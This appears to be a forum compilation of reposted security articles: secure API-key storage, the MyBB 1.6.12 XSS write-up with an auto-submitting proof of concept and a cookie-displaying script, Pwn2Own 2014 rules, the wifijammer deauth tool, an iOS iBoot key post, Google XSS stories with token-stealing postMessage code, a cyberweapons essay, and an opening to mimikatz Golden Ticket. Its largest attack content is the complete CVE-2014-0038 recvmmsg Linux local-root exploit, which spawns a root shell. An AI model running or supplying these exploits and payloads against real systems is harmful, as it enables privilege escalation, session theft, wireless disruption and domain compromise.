- Environment variables - these have the added advantage of making it easy to have different API keys or passwords for different environments your application may be deployed on (like development, staging and production for a web app).
- Config files that are kept out of version control - these are typically JSON or YAML files that contain any sensitive information, like API keys or passwords, that should not be publicly available. Your application can then just import this file and access all of the information it needs.

Depending on your programming language of choice, there may be libraries available to help you with this, like nconf for Node.js, or any of these RubyGems.

Removing sensitive information that's already in your repository

As stated above, the history features of version control systems mean that simply removing the tokens and then committing the result is not enough.
If you can, you might want to consider revoking the keys that have been made public, so that anybody who may have discovered them already will be prevented from using them. If not, your only option is to rewrite your entire commit history since the API keys were added.

If you are using Git, this is possible with the git-filter-branch command. GitHub has a good tutorial on it that details specifically the problem of removing sensitive data from a Git repository. Please be aware that this can cause problems if there are multiple collaborators on your project, as each collaborator will have to rebase their changes to be on top of yours.

Accidental API key exposure is one of those problems that is easy to avoid as long as you keep it in mind from the beginning of a project, but once you've slipped up, it becomes very difficult to fix. By keeping the dangers in mind, and making sure you're always keeping your API keys, passwords, and any other sensitive information out of version control from the beginning, you're protecting yourself from a very real and very severe threat to the security of both you and your users.

Sursa: Accidental API Key Exposure is a Major Problem | Ross Penman
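A footnote on the storage advice above: the environment-variable approach with a config-file fallback can be sketched in a few lines of Python. Names like `config.json` and `TWILIO_AUTH_TOKEN` here are illustrative, not from the article.

```python
import json
import os

def get_secret(name, config_path="config.json"):
    """Fetch a secret by name: check environment variables first, then an
    untracked JSON config file (which must be listed in .gitignore)."""
    value = os.environ.get(name)
    if value is not None:
        return value
    try:
        with open(config_path) as fh:
            return json.load(fh).get(name)
    except FileNotFoundError:
        return None

# e.g. auth_token = get_secret("TWILIO_AUTH_TOKEN")
```

Because the secret lives outside the repository, nothing sensitive is ever committed, so there is no history to scrub later.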
-
MyBB 1.6.12 POST XSS 0day

This is a weird bug I found in MyBB. I fuzzed the input of the search.php file. This was the input I gave:

<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

MyBB throws out a SQL error:

SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%<foo> <h1> <script> alert (bar) () ; //%' LOWER(t.subject) LIKE '%> < prompt \x41 \%42 constructor onload%')

This made me analyze and reverse the input to find the cause. After filtering it down, this was the minimal input which causes the error. This part must stay constant: or'("\

To reproduce this issue you can add any char value in front of or'("\ and 2 char values after or'("\ and you cannot have any spaces in between them. This will be the skeleton:

[1 char value]or'("\[2 char values]

Examples:

1or'("\00
qor'("\2a

You can have a space like this: qor'("\ a

SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%qor (%' LOWER(t.subject) LIKE '%\2a%')

How to Inject JavaScript and HTML?

We can inject HTML + JavaScript, but search.php filters out the ' " [ ] - characters. This is the method you could use to inject your payload: if we put our constant in the middle, we can inject our payload in front of it and after it. If we inject it at the beginning of the constant, the payload will be stored in this manner.
<Payload here>qor'("\2a

SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%<Payload Here>qor (%' LOWER(t.subject) LIKE '%\2a%')

For example, if we inject an HTML header at the beginning:

<h1>Osanda</h1>qor'("\2a

It will look like this inside the source:

SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%<h1>Osanda</h1>qor (%' LOWER(t.subject) LIKE '%\2a%')

Now if we inject at the end of the constant, the payload will be stored in two places in the source:

qor'("\2a<Payload Here>

The payload is thrown out in the SQL error itself:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOWER(t.subject) LIKE '%\2a<payload here>%')' at line 3

The second place is inside the query:

SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%qor (%' LOWER(t.subject) LIKE '%\2a<payload here>%')

Example: this would be an example of JavaScript being interpreted: <script>alert(/Osanda/)</script>. Notice that our string is converted to lower-case characters due to the SQL query. Remember this filters out the ' " [ ] - characters, therefore we can use an external script source for performing further client-side attacks.
Proof of Concept

<html>
<!--
Exploit-Title: MyBB 1.6.12 POST XSS 0day
Google-Dork: inurl:index.php intext:Powered By MyBB
Date: February 2nd, 2014
Bug Discovered and Exploit Author: Osanda Malith Jayathissa
Vendor Homepage: http://www.mybb.com
Software Link: http://resources.mybb.com/downloads/mybb_1612.zip
Version: 1.6.12 (older versions might be vulnerable)
Tested on: Windows 8 64-bit
Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day
-->
<body>
<form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST">
<input type="hidden" name="action" value="do_search" />
<input type="hidden" name="keywords" value="qor'("\2a<script>alert(/XSS/)</script> " />
<script>document.exploit.submit();</script>
</form>
</body>
</html>

POC Video

You could do something creative like this in an external source to view the domain and cookies, and to take exploitation beyond the filters. You can define your source like this:

<script src=poc />qor'("\2a</script>

This will be the content of the poc file:

document.write('<h1>MyBB XSS 0day</h1><br/><h2>Domain: ' + document.domain + '</h2><br/> <h3> Osanda and HR</h3><strong>User Cookies: </strong><br/>' + document.cookie);
alert('XSS by Osanda & HR');

Thanks to Hood3dRob1n for this idea. I have no idea how to inject SQL through this bug; you may give it a try and see.

Sursa: MyBB 1.6.12 POST XSS 0day | Blog of Osanda Malith
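A footnote on the trigger string: blog "smart quotes" tend to mangle it when copied from write-ups, so here is a tiny hypothetical Python helper (not part of the original exploit) that spells out the exact characters of the skeleton described above.

```python
def build_trigger(prefix, suffix):
    r"""Build the search keyword that triggers the MyBB SQL error.

    The skeleton is one arbitrary character, then the six-character
    constant (lowercase o, r, straight single quote, open parenthesis,
    straight double quote, backslash), then exactly two characters,
    with no spaces in between.
    """
    if len(prefix) != 1 or len(suffix) != 2:
        raise ValueError("need exactly 1 leading and 2 trailing characters")
    constant = "or'(\"\\"  # the six constant characters: o r ' ( " \
    return prefix + constant + suffix

# build_trigger("q", "2a") reproduces the qor'("\2a example from the write-up
```

The point is simply that the quotes must be straight ASCII quotes; the curly quotes a blog renders will not trigger the bug.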
-
-
-
-
Pwn2Own 2014: Rules and Unicorns Brian Gorenc, Manager, Vulnerability Research, HP Security Research HP’s Zero Day Initiative is once again expanding the scope of its annual Pwn2Own contest, with a new competition that combines multiple vulnerabilities for a challenge of unprecedented difficulty and reward. Last year we launched a plug-in track to the competition, in addition to our traditional browser targets. We’ll continue both tracks this year. For 2014, we’re introducing a complex Grand Prize challenge with multiple components, including a bypass of Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) protections – truly an Exploit Unicorn worthy of myth and legend, plus $150,000 to the researcher who can tame it (for additional background on this new category, see additional blog post here). Pwn2Own prize funds this year are expected to total over half a million dollars (USD) in cash and non-cash awards. As they did last year, our friends at Google are joining us in sponsoring all targets in the 2014 competition. Contest dates The contest will take place March 12-13 in Vancouver, British Columbia, at the CanSecWest 2014 conference. The schedule of contestants and platforms will be determined by random drawing at the conference venue and posted at Pwn2Own.com prior to the start of competition. Rules and prizes The 2014 competition consists of three divisions: Browsers, Plug-Ins, and the Grand Prize. All target machines will be running the latest fully patched versions of the relevant operating systems (Windows 8.1 x64 and OS X Mavericks), installed in their default configurations. The vulnerability or vulnerabilities used in each attack must be unknown and not previously reported to the vendor. A particular vulnerability can only be used once across all categories. The first contestant to successfully compromise a target within the 30-minute time limit wins the prize in that category. 
The 2014 targets are: Browsers: Google Chrome on Windows 8.1 x64: $100,000 Microsoft Internet Explorer 11 on Windows 8.1 x64: $100,000 Mozilla Firefox on Windows 8.1 x64: $50,000 Apple Safari on OS X Mavericks: $65,000 Plug-ins: Adobe Reader running in Internet Explorer 11 on Windows 8.1 x64: $75,000 Adobe Flash running in Internet Explorer 11 on Windows 8.1 x64: $75,000 Oracle Java running in Internet Explorer 11 on Windows 8.1 x64 (requires click-through bypass): $30,000 “Exploit Unicorn” Grand Prize: SYSTEM-level code execution on Windows 8.1 x64 on Internet Explorer 11 x64 with EMET (Enhanced Mitigation Experience Toolkit) bypass: $150,000* Please see the Pwn2Own 2014 rules for complete descriptions of the challenges. In particular, taming the Exploit Unicorn is a multi-step process, and competitors should be as familiar as possible with the necessary sequence of vulnerabilities required: The initial vulnerability utilized in the attack must be in the browser. The browser’s sandbox must be bypassed using a vulnerability in the sandbox. A separate privilege escalation vulnerability must be used to obtain SYSTEM-level arbitrary code execution on the target. The exploit must work when Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) protections are enabled. In addition to the cash prizes listed above, successful competitors will receive the laptop on which they demonstrate the compromise. They’ll also receive 20,000 ZDI reward points, which immediately qualifies them for Silver standing in the benefits program. (ZDI Silver standing includes a one-time $5,000 cash payout, a 15% monetary bonus on all vulnerabilities submitted to ZDI during the next calendar year, a 25% reward-point bonus on all vulnerabilities submitted to ZDI over the next calendar year, and paid travel and registration to attend the 2014 DEFCON conference in Las Vegas.) 
As ever, vulnerabilities and exploit techniques revealed by contest winners will be disclosed to the affected vendors, and the proof of concept will become the property of HP in accordance with the HP ZDI program. If the affected vendors wish to coordinate an onsite transfer at the conference venue, HP ZDI is able to accommodate that request. The full set of rules for Pwn2Own 2014 is available here. They may be changed at any time without notice. Registration Pre-registration is required to ensure we have sufficient resources on hand in Vancouver. Please contact ZDI at zdi@hp.com to begin the registration process. (Email only, please; queries via Twitter, blog post, or other means will not be acknowledged or answered.) If we receive more than one registration for any category, we’ll hold a random drawing to determine contestant order. Registration closes at 5pm Pacific time on March 10, 2014. Follow the action Pwn2Own.com will be updated periodically with blogs, photos and videos between now and the competition, and in real time during the event. If it becomes necessary to hold a drawing to determine contestant order, we will also update the site in real time during that process. Follow us on Twitter at @thezdi, and keep an eye on the #pwn2own hashtag for more coverage. Press: Please direct all Pwn2Own or ZDI-related media inquiries to Cassy Lalan, hpesp@bm.com. (*Real-life unicorn prize subject to availability) Sursa: Pwn2Own 2014: Rules and Unicorns - PWN2OWN
-
[h=1]wifijammer[/h] Continuously jam all wifi clients and access points within range. The effectiveness of this script is constrained by your wireless card. Alfa cards seem to effectively jam within about a block's range with heavy access point saturation. Granularity is given in the options for more effective targeting.

Requires: airmon-ng, python 2.7, python-scapy, a wireless card capable of injection

[h=2]Usage[/h]

[h=3]Simple[/h]

python wifijammer.py

This will find the most powerful wireless interface and turn on monitor mode. If a monitor mode interface is already up, it will use the first one it finds instead. It will then start sequentially hopping channels, one per second, from channel 1 to 11, identifying all access points and clients connected to those access points. On the first pass through all the wireless channels it only identifies targets. After that, the one-second-per-channel time limit is eliminated and channels are hopped as soon as the deauth packets finish sending. Note that it will still add clients and APs as it finds them after the first pass.

Upon hopping to a new channel it will identify targets that are on that channel and send 1 deauth packet to the client from the AP, 1 deauth to the AP from the client, and 1 deauth to the AP destined for the broadcast address to deauth all clients connected to the AP. Many APs ignore deauths to broadcast addresses.

Sursa: https://github.com/DanMcInerney/wifijammer
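The three deauth packets described above are bare 802.11 management frames. wifijammer itself crafts them with scapy, but the wire format is simple enough to sketch with only the standard library. The layout follows the 802.11 management frame header; this is an illustration of the frame the tool sends, not the tool's actual code.

```python
import struct

def mac_bytes(mac):
    """Convert 'aa:bb:cc:dd:ee:ff' to 6 raw bytes."""
    return bytes(int(octet, 16) for octet in mac.split(":"))

def build_deauth(dest, source, bssid, reason=7):
    """Build an 802.11 deauthentication frame (no radiotap header).

    Frame control 0x00C0 = management frame (type 0), subtype 12
    (deauthentication); reason code 7 = 'class 3 frame received from
    nonassociated station', a common choice for deauth tools.
    """
    frame_control = 0x00C0
    duration = 0
    sequence = 0
    header = struct.pack("<HH6s6s6sH", frame_control, duration,
                         mac_bytes(dest), mac_bytes(source),
                         mac_bytes(bssid), sequence)
    return header + struct.pack("<H", reason)

# A broadcast deauth "from" the AP, like the third packet the script sends:
frame = build_deauth("ff:ff:ff:ff:ff:ff", "00:11:22:33:44:55", "00:11:22:33:44:55")
```

Injecting such a frame still requires a monitor-mode interface and a driver that supports injection, which is why the README lists those as requirements.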
-
Process Explorer v16.0

By Mark Russinovich

Published: January 29, 2014

Download Process Explorer (1,215 KB)

Introduction

Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.

The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded.

Process Explorer also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded.

The unique capabilities of Process Explorer make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work.

Download

Download Process Explorer (1,215 KB)

Run Process Explorer now from Live.Sysinternals.com

Sursa: Process Explorer
-
iPhone 4s, iPad 2 / 3, iPad mini, iPod touch 5 Jailbroken For Life!

By Ben Reid | February 2nd, 2014

iOS hacker iH8sn0w has discovered a way to untether jailbreak devices powered by the Apple A5(X) processor for life, which includes the iPhone 4s, iPod touch 5, the iPad 2 / 3 and iPad mini. Details are relatively scarce at this moment regarding the iBoot exploit, although if the exploits were ever bound together and released in the form of a jailbreak utility, those who own any of these devices would be able to enjoy a potentially indefinite, untethered jailbreak.

Even though the jailbreak scene is very much a here-and-now kind of pastime, in that most enthusiasts are keen to find ways to breach the latest versions, it's always nice to see progress of any kind. And by the sounds of things, this is a pretty significant inroad. Taking to his Twitter feed, iH8sn0w posted the A5 AES keys:

So looks like all my A5(X) devices are fully untethered and jailbroken for life now. A5 AES Keys anyone?

4S 7.0.4 iBSS -iv 3a0fc879691a5a359973792bcd367277 -k 371e3aea9121d90b8106228bf2b5ee4c638a0b4837fefbd87a3c0aca646e5996

All A5(X) AES Keys will be posted on @icj_'s icj.me/ios/keys as soon as I clean this up a bit more

Then, in speaking to fellow hacker Winocm, one of the guys behind p0sixspwn, iH8sn0w offered something of an insight into how exactly he managed to work the magic:

This isn't a bootrom exploit. Still a very powerful iBoot exploit though (when exploited properly ;P /cc @winocm).

One follower also noted that iBoot jailbreaks can be patched by Apple on the fly. iH8sn0w responded to this by noting that they can be patched provided that they are released publicly. Also, to further add fuel to this argument, Saurik took to a thread on Reddit to shed some light on the situation:

For informational purposes (as many people reading might not appreciate the difference), to get the encryption keys you only need an "iBoot exploit", not a "bootrom exploit".
It is easier to find iBoot exploits (being later in the boot sequence, it has a larger attack surface: it has to be able to parse filesystems, for example), and they do afford more power over the device than an untethered userland exploit (in addition to letting you derive firmware encryption keys, you can boot custom kernels, and you might be able to dump the bootrom itself), but they are software updatable as part of new firmware releases from Apple and may have "insane setup requirements" (like, you might pretty much need an already-jailbroken device to actually setup the exploit). You thereby wouldn’t see an iBoot exploit used for a jailbreak (unless everyone is out of ideas for a very long time): instead, you’d see it hoarded away as a "secret weapon" used by jailbreakers to derive these encryption keys, making it easier to find and implement exploits on newer firmware updates for the same device (especially kernel exploits, where even if you have an arbitrary write vulnerability you are "flying blind" and thinking "ok, now where should I write? I can’t see anything… :’("). But the big question is: will the exploit ever go public? Sadly, it won’t, according to a tweet by Winocm. There’s no doubt that this is very exciting news, and we’ll be keeping a close eye on what remains a developing sequence of events, so stay tuned! You can follow us on Twitter, add us to your circle on Google+ or like our Facebook page to keep yourself updated on all the latest from Microsoft, Google, Apple and the Web. Sursa: iPhone 4s, iPad 2 / 3, iPad mini, iPod touch 5 Jailbroken For Life! | Redmond Pie
-
Two stories about XSS on Google Story 1. The Little Content Type that Could The vulnerability was found in Feedburner. First, I created a feed and tried to inject malicious data. No success there. Injected data just wouldn’t show up, only harmless links were presented. I took a few more attempts and then I found lots of messages from PodMedic. PodMedic examines links in every feed. If it finds troubles in creating a feed, it reports the cause of such troubles. The messages read that links are incorrect because the content type returned was a text type. Hmm. Ok. I bet the content type on this page isn't filtered. A simple script for my server: <?php header('Content-Type: text/<img src=z onerror=alert(document.domain)>; charset=UTF-8'); ?> And here it is: Story 2. The Little Callback that Could The Feedburner vulnerability was not satisfying. It was quite simple, actually. So I decided to try something else. APIs Explorer on developers.google.com caught my attention after some searching. Google’s APIs Explorer is a tool that helps you to explore various Google APIs interactively. Google also says that with the APIs Explorer, we can browse quickly through available APIs and versions, see methods available for each API and what parameters they support along with inline documentation and blah blah blah. In fact I was interested in cross-domain messaging based on postMessage. A link to the Google API that we are testing can be given in the Base parameter: https://developers.google.com/apis-explorer/?base=https://webapis-discovery.appspot.com/_ah/api#p/ The Base parameter is filtered by certain regular expressions (not quite accurately though) but it is easy to bypass them using a %23 symbol: https://developers.google.com/apis-explorer/?base=https://evil.com%23webapis-discovery.appspot.com/_ah/api#p/admin/reports_v1/ As a result, an iframe with src=evil.com is created and now we’re waiting for messages from it. Every message should have two tokens. 
The first token is in the window.name of the iframe; the second is given in location.hash. I sniffed messages from https://webapis-discovery.appspot.com/_ah/api and wrote a page that would send the same messages with valid tokens. It worked nicely, and I tried to inject some HTML data. No success though. I could change text and image locations, but it would not be enough for XSS. There was a documentation link, the location of which could be changed. So I changed it to javascript:alert(document.domain) and it worked perfectly. Still not enough. It required user interaction, and I really don't like that. Users never do what you want them to do (click that wrong link, for instance).

So I found a page on developers.google.com with a callback function (almost all developers think that callbacks are secure). I added redirection to this page, with the callback 'parent.document.links[0].click', to my exploit after creating the documentation link via postMessage. (Symbols [ and ] were filtered, so actually the callback was as follows: document.body.lastElementChild.previousSibling.lastElementChild.firstElementChild.firstElementChild.lastElementChild.firstElementChild.firstElementChild.firstElementChild.nextSibling).

Let's try it: Done! Works fine and no need for user interaction. The exploit was as follows:

token_1 = location.hash.split('rpctoken=')[1];
token_2 = window.name;
send_payload(data,token_1,token_2);
window.setTimeout('document.location=callback_url;',3000); // Paused because of a slow internet connection...

And of course I made a cool screenshot. I liked that method of exploiting and tried to use it in other services. I used it to steal an OAuth token and to buy any app at Google Play using users' payment details. Besides, the app could automatically be installed on the user's Android device. The Google Security Team also liked that technique and they described it at OWASP AppSec EU as Reverse Clickjacking.

Posted by Paul Axe at 6:03

Sursa: @Paul_Axe : Two stories about XSS on Google
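A footnote on story 1: the root cause there is a plain reflection bug. PodMedic echoed the feed's Content-Type into its diagnostic message without HTML-escaping it. A hypothetical before/after sketch (the message template is invented; only the content-type string comes from the article):

```python
import html

# The feed URL's Content-Type, fully attacker-controlled:
content_type = "text/<img src=z onerror=alert(document.domain)>; charset=UTF-8"

# Vulnerable: the value is interpolated into the page markup verbatim,
# so the <img onerror=...> payload executes in the site's origin.
vulnerable = "Links are incorrect: content type was %s" % content_type

# Fixed: HTML-escape anything attacker-controlled before it hits the page.
fixed = "Links are incorrect: content type was %s" % html.escape(content_type)
```

Escaping at the point of output is what turns the injected tag into inert text, which is why the Content-Type trick only works on pages that skip that step.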
-
recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)

Detalii: http://seclists.org/oss-sec/2014/q1/187

Note: the forum software mangled the original listing (the BBCode parser ate the [i] array indices and similar bracketed text); the code below restores them.

/*
 *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
 * recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
 * CVE-2014-0038 / x32 ABI with recvmmsg
 * by rebel @ irc.smashthestack.org
 * -----------------------------------
 *
 * takes about 13 minutes to run because timeout->tv_sec is decremented
 * once per second and 0xff*3 is 765.
 *
 * some things you could do while waiting:
 * - watch 3 times
 * - read https://wiki.ubuntu.com/Security/Features and smirk a few times
 * - brew some coffee
 * - stare at the countdown giggly with anticipation
 *
 * could probably whack the high bits of some pointer with nanoseconds,
 * but that would require a bunch of nulls before the pointer and then
 * reading an oops from dmesg, which isn't that elegant.
 *
 * &net_sysctl_root.permissions is nice because it has 16 trailing
 * nullbytes. hardcoded offsets because I only saw this on ubuntu &
 * kallsyms is protected anyway.. same principle will work on 32bit but
 * I didn't really find any major distros shipping with CONFIG_X86_X32=y
 *
 * user@ubuntu:~$ uname -a
 * Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
 * user@ubuntu:~$ gcc recvmmsg.c -o recvmmsg
 * user@ubuntu:~$ ./recvmmsg
 * byte 3 / 3.. ~0 secs left.
 * w00p w00p!
 * # id
 * uid=0(root) gid=0(root) groups=0(root)
 * # sh phalanx-2.6b-x86_64.sh
 * unpacking..
 *
 * greets to my homeboys kaliman, beist, capsl & all of #social
 * Sat Feb 1 22:15:19 CET 2014 % rebel %
 *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
 */

#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/utsname.h>

#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define VLEN 1
#define BUFSIZE 200

int port;

struct offset {
    char *kernel_version;
    unsigned long dest;            // net_sysctl_root + 96
    unsigned long original_value;  // net_ctl_permissions
    unsigned long prepare_kernel_cred;
    unsigned long commit_creds;
};

struct offset offsets[] = {
    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40},    // Ubuntu 13.10
    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0,0xffffffff81084500},     // Ubuntu 13.04
    {NULL,0,0,0,0}
};

void udp(int b)
{
    int sockfd;
    struct sockaddr_in servaddr,cliaddr;
    int s = 0xff+1;

    if(fork() == 0) {
        while(s > 0) {
            fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
            sleep(1);
            s--;
            fprintf(stderr,".");
        }

        sockfd = socket(AF_INET,SOCK_DGRAM,0);

        bzero(&servaddr,sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
        servaddr.sin_port=htons(port);
        sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
        exit(0);
    }
}

void trigger()
{
    open("/proc/sys/net/core/somaxconn",O_RDONLY);

    if(getuid() != 0) {
        fprintf(stderr,"not root, ya blew it!\n");
        exit(-1);
    }

    fprintf(stderr,"w00p w00p!\n");
    system("/bin/sh -i");
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

// thx bliss
static int __attribute__((regparm(3))) getroot(void *head, void *table)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

void __attribute__((regparm(3))) trampoline()
{
    asm("mov $getroot, %rax; call *%rax;");
}

int main(void)
{
    int sockfd, retval, i;
    struct sockaddr_in sa;
    struct mmsghdr msgs[VLEN];
    struct iovec iovecs[VLEN];
    char buf[BUFSIZE];
    long mmapped;
    struct utsname u;
    struct offset *off = NULL;

    uname(&u);

    for(i=0;offsets[i].kernel_version != NULL;i++) {
        if(!strcmp(offsets[i].kernel_version,u.release)) {
            off = &offsets[i];
            break;
        }
    }

    if(!off) {
        fprintf(stderr,"no offsets for this kernel version..\n");
        exit(-1);
    }

    mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));
    mmapped &= 0x000000ffffffffff;

    srand(time(NULL));
    port = (rand() % 30000)+1500;

    commit_creds = (_commit_creds)off->commit_creds;
    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;

    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC,
                         MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

    if(mmapped == -1) {
        perror("mmap()");
        exit(-1);
    }

    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE),(char *)&trampoline,300);

    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
        perror("mprotect()");
        exit(-1);
    }

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(-1);
    }

    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);

    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(-1);
    }

    memset(msgs, 0, sizeof(msgs));

    iovecs[0].iov_base = &buf;
    iovecs[0].iov_len = BUFSIZE;
    msgs[0].msg_hdr.msg_iov = &iovecs[0];
    msgs[0].msg_hdr.msg_iovlen = 1;

    for(i=0;i < 3;i++) {
        udp(i);
        retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
        if(!retval) {
            fprintf(stderr,"\nrecvmmsg() failed\n");
        }
    }

    close(sockfd);
    fprintf(stderr,"\n");
    trigger();
}

Sursa: [C] recvmmsg.c - Pastebin.com
-
If This Is Cyberwar, Where Are All the Cyberweapons?

The discovery of Stuxnet in 2010 seemed to herald a new age of cyberwar, but that age has yet to materialize.

By Paul F. Roberts on January 27, 2014

Like the atomic bomb in the waning days of World War II, the computer virus known as Stuxnet, discovered in 2010, seemed to usher in a new era of warfare. In the era of cyberwar, experts warned, silent, software-based attacks will take the place of explosive ordnance, tanks, and machine guns, or at least set the stage for them. Or maybe not. Almost four years after it was first publicly identified, Stuxnet is an anomaly: the first and only cyberweapon ever known to have been deployed. Now some experts in cybersecurity and critical infrastructure want to know why. Are there fewer realistic targets than suspected? Are such weapons more difficult to construct than realized? Or is the current generation of cyberweapons simply too well hidden? Such questions were on the minds of the world's top experts in the security of industrial control systems last week at the annual S4 conference outside Miami. S4 gathers the world's top experts on the security of nuclear reactors, power grids, and assembly lines. At S4 there was broad agreement that—long after Stuxnet's name has faded from the headlines—industrial control systems like the Siemens Programmable Logic Controllers are still vulnerable. Eireann Leverett, a security researcher at the firm IOActive, told attendees at the conference that commonplace security practices in the world of enterprise information technology are still uncommon among vendors who develop industrial control systems (see "Protecting Power Grids from Hackers Is a Huge Challenge").
Leverett noted that modern industrial control systems, which sell for thousands of dollars per unit, often ship with software that lacks basic security controls like user authentication, code signing to prevent unauthorized software updates, or event logging to allow customers to track changes to the device. It is also clear that, in the years since Stuxnet came to light, developed and developing nations alike have seized on cyber operations as a fruitful new avenue for research and development (see “Welcome to the Malware Industrial Complex”). Laura Galante, a former U.S. Department of Defense intelligence analyst who now works for the firm Mandiant, said that the U.S. isn’t just tracking the activities of nations like Russia and China, but also Syria and Stuxnet’s target of choice: Iran. Galante said cyberweapons give smaller, poorer nations a way to leverage asymmetric force against much larger foes. Even so, truly effective cyberweapons require extraordinary expertise. Ralph Langner, perhaps the world’s top authority on the Stuxnet worm, argues that the mere hacking of critical systems doesn’t count as cyberwarfare. For example, Stuxnet made headlines for using four exploits for “zero day” (or previously undiscovered) holes in the Windows operating system. But Langner said the metallurgic expertise needed to understand the construction of Iran’s centrifuges was far more impressive. Those who created Stuxnet needed to know the exact amount of pressure or torque needed to damage aluminum rotors within them, sabotaging the country’s uranium enrichment operation. Concentrating on software-based tools that can cause physical harm sets a much higher bar for discussions of cyberweapons, Langner argues. By that standard, Stuxnet was a true cyberweapon, but the 2012 Shamoon attack against the oil giant Saudi Aramco and other oil companies was not, even though it erased the hard drives of the computers it infected. 
Some argue that the conditions for using such a destructive cyberweapon simply haven't arisen again—and aren't likely to for a while. Operations like Stuxnet—stealth projects designed to slowly degrade Iran's enrichment capability over years—are the exception rather than the rule, said Thomas Rid of the Department of War Studies at King's College London. "There are not too many targets that would lend themselves to a covert campaign as Stuxnet did," Rid said. Rid told attendees that the quality of the intelligence gathered on a particular target makes the difference between an effective cyberweapon and a flop. It's also possible that other cyberweapons have been used, but the circumstances surrounding their use are a secret, locked up by governments as "classified" information, or protected by strict nondisclosure agreements. Indeed, Langner, who works with some of the world's leading industrial firms and governments, said he knows of one other true physical cyberattack, this one tied to a criminal group. But he wouldn't talk about it. Industrial control professionals and academics complain that the information needed to research future attacks is being kept out of the public domain. And public utilities, industrial firms, and owners of critical infrastructure are just now becoming aware that systems they assumed were cordoned off from the public Internet very often are not. Meanwhile, technology is driving even more rapid and transformative changes as part of what's called the Internet of things. Ubiquitous Internet connectivity combined with inexpensive and tiny computers and sensors will soon allow autonomous systems to communicate directly with each other (see "Securing the Smart Home, from Toasters to Toilets"). Without proper security features built into industrial products from the get-go, the potential for attacks and physical harm increases dramatically. "If we continue to ignore the problem, we are going to be in deep trouble," Langner said.
Sursa: Where Are All the Cyberweapons? | MIT Technology Review
-
[h=1]mimikatz - Golden Ticket[/h]

[h=2]Introduction[/h]

We have a new feature again in mimikatz called Golden Ticket, provided by Benjamin Delpy aka gentilkiwi. With this technique, we can basically access any resource in the domain. Here is the list of what you need to make it work:

- krbtgt user's NTLM hash (e.g. from a previous NTDS.DIT dump)
- Domain name
